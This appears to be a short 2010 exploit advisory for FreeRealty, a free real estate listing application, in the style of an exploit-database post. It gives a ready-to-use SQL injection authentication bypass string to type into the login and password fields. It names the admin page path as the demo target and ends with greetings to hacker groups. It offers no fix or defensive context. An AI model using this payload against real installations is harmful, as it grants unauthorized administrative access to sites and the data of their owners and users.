# Exploit Title: Authentication bypass in FreeRealty(Free Real Estate Listing Software)
# Date: 27-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : [] ______________________________________________________________________________ Authentication bypass in FreeRealty
Description :
Free Realtyis primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design.
script cost :Free
* Authentication bypass:
The following script has authentication bypass.
use ' or 1=1 or ''=' in both login and password.
DEMO :http://[site]/demo/agentadmin.php
ShoutZ :
---Indian Cyber warriors--Andhra hackers--
Greetz :
---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--